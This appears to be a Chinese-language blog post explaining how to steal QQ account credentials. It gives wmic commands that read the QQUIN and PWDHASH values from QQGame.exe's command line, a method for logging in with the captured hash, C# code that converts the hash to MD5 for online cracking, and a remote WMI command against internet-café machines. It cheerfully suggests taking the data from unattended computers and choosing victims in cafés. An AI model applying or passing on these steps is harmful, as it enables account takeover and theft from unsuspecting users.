利用QQ遊戲破解QQ密碼

大家知道，當我們登入QQ後，可以直接在QQ上啟動QQ遊戲，這時候QQ遊戲會啟動，并以目前QQ使用者進行登入，而不需要輸入QQ号及密碼。

我這個人應該算是比較善于思考的了(-^_^-)，我想QQ肯定是通過某種方式把QQ号及密碼資訊傳遞給QQ遊戲了。

我們來看一下QQ遊戲的指令行（有的任務管理器可以直接看到）：

打開指令提示符視窗

輸入wmic 回車 （如果是第一次使用wmic，會提示正在安裝，稍等幾秒鐘就行了）

然後輸入process 回車

此時會顯示所有的程序，找到QQ遊戲(QQGame.exe)，會發現其指令行有這樣一段：

/START QQUIN:xxx PWDHASH:xxx

（也可以直接在指令行下輸入wmic process where "Name='QQGame.exe'" Get CommandLine）

此時其實已經可以算是破解成功了，因為你已經可以在指令行下輸入以下内容進行登入了：

QQ.exe全路徑 /START QQUIN:xxx PWDHASH:xxx

由于QQ2009之後已經不支援指令行登入了，是以需要使用QQ2008或更早版本（注意：這裡隻要求破解者使用QQ2008 ，被破解者則無要求，是以對破解而言是沒有任何障礙的，你完全可以趁某人離開位置而沒有關QQ時，用其QQ打開QQ遊戲（當然，如果已經打開了，就不需要了），然後用上面的方法獲得指令行，儲存起來（例如儲存到郵箱），然後回家慢慢破，呵呵(-@[email protected])

現在我來解釋一下：

QQUIN後面的相信你已經看出來了，其實就是QQ号，而PWDHASH是什麼呢，它其實是密碼通過MD5加密後，再經Base64轉換而得的，C#代碼如下：

string GetPWDHASH(string password)

{

    byte[] passwordBytes = Encoding.ASCII.GetBytes(password);

    byte[] md5Bytes = new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(passwordBytes);

    string base64 = Convert.ToBase64String(md5Bytes);

    return base64;

}

知道了加密原理，解密就不難了，但是由于MD5算法是雜湊演算法，不可逆的，是以我們隻能獲得其MD5值，沒有十分有效的方法獲得原始密碼，獲得MD5值的C#代碼如下：

string GetMD5FromPWDHASH(string PWDHASH)

{

    byte[] md5Bytes = Convert.FromBase64String(PWDHASH);

    string md5 = BitConverter.ToString(md5Bytes).Replace("-", "");

    return md5;

}

前面說到，MD5是不可逆的，但是也不是說完全不可破解，如果密碼比較簡單，可以采用暴力破解，不過我推薦使用線上MD5查詢網站來破，比如http://www.cmd5.com。

當然，其實大可不必知道其真正的密碼，因為你隻需要知道其PWDHASH，你就已經可以使用該QQ進行登入了。

另外，現在有的網吧安全性比較差，可以直接使用WMI進行遠端操作(WMI不在本文的讨論範疇，我隻給一條指令，不作解釋：/node:ip /user:administrator /password: "" process)，這樣就更爽了，隻需要在網吧轉一圈，觀察哪些人在玩QQ遊戲，然後就可以下手了，呵呵。